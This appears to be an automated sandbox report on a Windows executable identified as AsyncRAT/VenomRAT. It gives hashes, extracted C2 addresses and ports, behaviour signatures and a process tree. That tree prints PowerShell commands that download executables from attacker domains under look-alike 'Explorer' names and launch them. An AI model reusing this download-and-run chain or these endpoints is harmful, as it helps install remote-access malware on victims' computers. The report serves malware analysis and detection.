Overview

overview

10

Static

static

10

Client.exe

windows7-x64

10

Client.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-10-2024 21:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Client.exe

  • Size

    75KB

  • MD5

    0cc47ff18d0e3298f9beab60d3aa579e

  • SHA1

    67c3020a046707cbde4dea02352272d6e6b77189

  • SHA256

    87dc5fec26bd15e8a2d4d47a3d29b8fe43be265666770bdecfb496c77c0e3212

  • SHA512

    e0f0627aa715665a27e3b505af264c3c2500b9414764d028fa0ecba0dc979a187f75baf4f97b4793b31325dda65310d8a3e3eccfe676b1f7b13e47334b5fe5b3

  • SSDEEP

    1536:fukU0OSeCX/PMRkYKt2OlY6H1bf/i7AkzkiLVclN:fXUHjAPMRkYv4jH1bfVk7BY

Score
10/10
asyncratdefaultexecutionrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://xcu.exgaming.click

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://xcu5.exgaming.click

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

51.254.53.24:4449

86.68.222.14:4449
Mutex

ygfmgwcmzefwhl

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • VenomRAT 1 IoCs

    Detects VenomRAT.

    rat
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Start PowerShell.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3476
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2512
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1864
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:3176
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:5072
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:4800

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    aa8efa56e1e40374bbd21e0e469dceb7

    SHA1

    33a592799d4898c6efdd29e132f2f76ec51dbc08

    SHA256

    25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf

    SHA512

    ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    fb4cb72fdb972bec9083e291598e5107

    SHA1

    6208b997143f2ab175ac2bc5b827547c01ba9339

    SHA256

    a68190a9f6559f74a8c0ac2eef3b36b990d2cc032d8e3b565b6db38ac2f33ef6

    SHA512

    3b34b2ec66dc18869c75207d9a6b3001d4ba451404de7e64aaab3b41f822607aeb8997963d925bf1363d00ee354c44574b87c5573d8a3f044625992fc8614ba5

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    cf989d8b59ce7eb32775f651bfe5887c

    SHA1

    790b46aba93b4571facca9d3b6dc4d07ad0a53b2

    SHA256

    7b229a233c8625cd83ca18f6853abfb05f32a1b31455fcd2cb90005a4575490c

    SHA512

    782b93a7173805ad42caa07ca2bfcd3c3ced136a04554765189e7bdde0518b29b29eb33446327f22f6d370030f10e08a54687557944ddeec0c223a2623e220f7

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ziybqwij.00b.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/1864-9-0x000002D7DF1F0000-0x000002D7DF212000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1864-15-0x00007FF92BA10000-0x00007FF92C4D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1864-16-0x00007FF92BA10000-0x00007FF92C4D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1864-19-0x00007FF92BA10000-0x00007FF92C4D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1864-14-0x00007FF92BA10000-0x00007FF92C4D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3476-0-0x00007FF92BA13000-0x00007FF92BA15000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3476-3-0x00007FF92BA10000-0x00007FF92C4D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3476-1-0x0000000000C70000-0x0000000000C88000-memory.dmp

    Filesize

    96KB

    Download

  • memory/3476-54-0x00007FF92BA13000-0x00007FF92BA15000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3476-55-0x00007FF92BA10000-0x00007FF92C4D1000-memory.dmp

    Filesize

    10.8MB

    Download